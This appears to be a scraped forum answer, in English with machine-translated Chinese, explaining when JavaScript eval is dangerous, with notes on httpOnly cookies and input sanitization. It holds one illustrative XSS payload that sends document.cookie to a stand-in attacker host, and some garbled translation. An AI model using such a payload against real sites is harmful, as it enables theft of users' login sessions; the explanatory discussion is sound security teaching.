You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hiHymaning your feature that uses evalfor his own ends.

无论如何，最终用户都可以通过浏览器的开发人员控制台轻松执行任意 JavaScript，这是对的（我一直都这样做）。您需要担心的是攻击者会劫持您eval用于自己目的的功能。

The reason evalis generally considered dangerous is because it is veryeasy for untrusted code to sneak in. Consider a page that allows you specify input via query string, where the input box is prepopulated with the value in the query string.

原因eval通常被认为是危险的，因为不受信任的代码很容易潜入。考虑一个允许您通过查询字符串指定输入的页面，其中输入框预先填充了查询字符串中的值。

An attacker could spread a link that contains code which steals a user's login cookie:

攻击者可以传播包含窃取用户登录 cookie 的代码的链接：

/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;

(Obviously proper URL encoding is required; this is for illustration.)

（显然需要正确的 URL 编码；这是为了说明。）

Or, perhaps your PHP script echos posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.

或者，当验证失败时，您的 PHP 脚本可能会将发布的数据回显到您的表单中。攻击者可以创建一个特制的表单，使用相同的 cookie 窃取代码发布到您的表单。

Each of these attacks can be mitigated by using httpOnlycookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).

这些攻击中的每一种都可以通过使用httpOnlycookie（以防止被盗登录 cookie）或确保数据经过清理来减轻- 但关键是这甚至与事情可能出错的详尽列表相去甚远。例如，注入的脚本仍然可以在金额字段中插入 1000 并尝试将该金额转入攻击者的帐户（如果这是汇款页面）。

Even given the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!

即使考虑到您使用正则表达式来清理输入的事实也不一定能保护您：完全可以用括号编写任意 JavaScript ！

So the bottom line is that if you can make absolutely surethat the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, evaling it may expose you to a vulnerability.

所以最重要的是，如果你能绝对确保输入进入你的文本字段的唯一方式是通过用户输入，你就没事：用户没有获得任何他们无法做到的事情通过控制台。但是，如果攻击者可以以某种方式将他们自己的数据带入该字段，eval则可能会使您暴露在漏洞中。

See also:

也可以看看：

• JavaScript to evaluate simple math string like 5*1.2 (eval/white-list?)
• JavaScript written only with brackets?

• JavaScript 评估简单的数学字符串，如 5*1.2（评估/白名单？）
• JavaScript 只用括号编写？

If you need it, use it.

如果您需要它，请使用它。

Here's a good link, which discusses both security ... as well as other common objections to "eval()":

这是一个很好的链接，它讨论了安全性……以及对“eval()”的其他常见反对意见：

• http://javascriptweblog.wordpress.com/2010/04/19/how-evil-is-eval/

What about security? If its your software that's supplying eval with its argument then there's very little to fear on this front. Sure, it would be unwise to eval the value of an input box, but running eval over a response generated by your own server code should present no special risk. Also bear in mind there is no damage a would-be-attacker could do with client side eval that they couldn't more easily achieve with a modern browser console.

• http://javascriptweblog.wordpress.com/2010/04/19/how-evil-is-eval/

安全呢？如果您的软件为 eval 提供参数，那么在这方面就没什么可担心的。当然，评估输入框的值是不明智的，但是对由您自己的服务器代码生成的响应运行 eval 应该不会带来特殊风险。还要记住，潜在的攻击者可以使用客户端 eval 造成的任何损害，他们无法使用现代浏览器控制台更轻松地实现。

IMHO ...

恕我直言 ...